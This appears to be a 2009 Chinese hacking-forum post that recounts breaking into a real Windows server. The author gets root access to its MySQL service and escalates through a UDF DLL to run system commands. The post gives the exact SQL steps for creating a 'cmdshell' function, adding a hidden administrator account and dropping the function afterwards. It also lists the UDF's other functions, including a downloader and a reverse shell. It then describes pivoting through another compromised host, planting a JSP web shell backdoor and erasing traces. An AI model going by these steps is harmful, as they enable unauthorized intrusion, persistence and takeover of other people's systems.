|
|
scan port:3306、3389是开的,没有21ftp端口,从ftp下手的想法断掉了。 用mysql-front 连上目标主机,看了下权限,竟然还是root。想到用select into outfile 导出个jspshell到web目录(目标web是apache tomcat5.5.20)问题是一直弄不到web绝对路径。试了N多法子都挖不出来。也猜过N个
c:/tomcat/webapps/root/.......
后来想起邪八上看到的那篇文章:
《将MYSQL读写权限转化为系统system权限》作者:langouster 图文并茂,很明了。
那个脚本是早就在机子里了,copy到支持php的web环境(本机搭建好了)。
顺利连接,按步子走:
1 导出到:C:\Windows\udf.dll (win2003系统,偶觉得导出到系统目录方便些)
2 Create Function cmdshell returns string soname 'udf.dll' (创建cmdshell功能函数)
3 select cmdshell('net user') (调用cmdshell函数来执行 net user 命令,查看当前用户)
4 select cmdshell('net user name$ pass /add') (添加用户)
5 select cmdshell('net user localgroup administrators name$ /add') (加入管理组)
6 select cmdshell('net user name$') (查看下用户添加是否成功)
6 drop function cmdshell; (把cmdshell函数删除)
功能函数列表及说明:
cmdshell 执行cmd;
downloader 下载者,到网上下载指定文件并保存到指定目录;
open3389 通用开3389终端服务,可指定端口(不改端口无需重启);
backshell 反弹Shell;
ProcessView 枚举系统进程;
KillProcess 终止指定进程;
regread 读注册表;
regwrite 写注册表;
shut 关机,注销,重启;
about 说明与帮助函数;
接下来先登陆到目标局域网的另一台已经拿下权限的肉鸡上(目标3389限制IP的),然后再连上目标终端,找到web目录,找个深点的目录,写个jspshell方便管理了。做好后门,擦屁股闪人。
ps:试过剑心那个 sqlrootkit.php 在执行命令的时候 提示mysqlexec 不存在。其他功能都可以。当然还是上面的功能丰富好用了。 |
|
发表于 2009-7-10 23:21:45